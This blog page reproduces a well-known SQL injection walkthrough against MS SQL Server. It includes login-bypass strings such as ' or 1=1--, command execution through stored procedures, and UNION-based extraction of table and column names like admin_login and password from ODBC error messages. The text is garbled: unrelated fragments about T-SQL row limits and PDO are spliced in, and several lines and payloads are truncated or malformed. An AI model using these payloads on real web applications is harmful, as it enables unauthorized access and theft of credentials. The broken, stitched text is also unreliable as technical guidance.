SQL Injection Walkthrough. Introduction. When a machine has only port 8. ![]() SQL injection is one of type of web hacking that require nothing but port 8. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS. This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen- test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9. Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection. What is SQL Injection? It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else. What do you need? Any web browser. 2. Is there any way to select, for example, first 10 rows of a table in T-SQL (working MSSQL)? I think I saw something in Oracle defined as rownum meta variable, used in. PDO::exec() executes an SQL statement in a single function call, returning the number of rows affected by the statement. PDO::exec() does not return results from a. I want to update the top 100 records in SQL Server. I have a table T1 with fields F1 and F2. T1 has 200 records. I want to update the F1 field in the top 100 records. What you should look for? Try to look for pages that allow you to submit data, i. Sometimes, HTML pages use POST command to send parameters to another ASP page. ![]() Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes: < FORM action=Search/search. A value=C> < /FORM> Everything between the < FORM> and < /FORM> have potential parameters that might be useful (exploit wise). ![]() Summary: The following article will try to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques, to successfully. What if you can't find any page that takes input? You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like: http: //duck/index. How do you test if it is vulnerable? Update Top N Rows Sql Injection DownloadStart with a single quote trick. Input something like: hi' or 1=1- -Into login, or password, or even in the URL. Example: - Login: hi' or 1=1- -- Pass: hi' or 1=1- -- http: //duck/index. If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example: < FORM action=http: //duck/Search/search. A value="hi' or 1=1- -"> < /FORM> If luck is on your side, you will get login without any login name or password. But why ' or 1=1- -? Let us look at another example why ' or 1=1- - is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL: http: //duck/index. In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise): v_cat = request("category")sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"set rs=conn. As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become: SELECT * FROM product WHERE PCategory='food'The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'. Now, assume that we change the URL into something like this: http: //duck/index. Now, our variable v_cat equals to "food' or 1=1- - ", if we substitute this in the SQL query, we will have: SELECT * FROM product WHERE PCategory='food' or 1=1- -'The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "- -" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#". However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try' or 'a'='a. The SQL query will now become: SELECT * FROM product WHERE PCategory='food' or 'a'='a'It should return the same result. Depending on the actual SQL query, you may have to try some of these possibilities: ' or 1=1- -" or 1=1- -or 1=1- -' or 'a'='a" or "a"="a') or ('a'='a. How do I get remote execution with SQL injection? Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master. Try using double quote (") if single quote (') is not working. The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 1. If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures. How to get output of my SQL query? It is possible to use sp_makewebtask to write your query into an HTML: '; EXEC master. SELECT * FROM INFORMATION_SCHEMA. TABLES"But the target IP must folder "share" sharing for Everyone. How to get data from the database using ODBC error message. We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example: http: //duck/index. We will try to UNION the integer '1. UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES- -The system table INFORMATION_SCHEMA. TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query: SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES- This should return the first table name in the database. When we UNION this string value to an integer 1. MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error: Microsoft OLE DB Provider for ODBC Drivers error '8. Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table. The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table. To get the next table name, we can use the following query: http: //duck/index. UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES WHERE TABLE_NAME NOT IN ('table. We also can search for data using LIKE keyword: http: //duck/index. UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES WHERE TABLE_NAME LIKE '%2. Output: Microsoft OLE DB Provider for ODBC Drivers error '8. Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. The matching patent, '%2. SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login". How to mine all column names of a table? We can use another useful table INFORMATION_SCHEMA. COLUMNS to map out all columns name of a table: http: //duck/index. UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. COLUMNS WHERE TABLE_NAME='admin_login'- -Output: Microsoft OLE DB Provider for ODBC Drivers error '8. Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. Now that we have the first column name, we can use NOT IN () to get the next column name: http: //duck/index. UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')- -Output: Microsoft OLE DB Provider for ODBC Drivers error '8. Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. When we continue further, we obtained the rest of the column name, i. We know this when we get the following error message: http: //duck/index. UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')- -Output: Microsoft OLE DB Provider for ODBC Drivers error '8. Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
October 2017
Categories |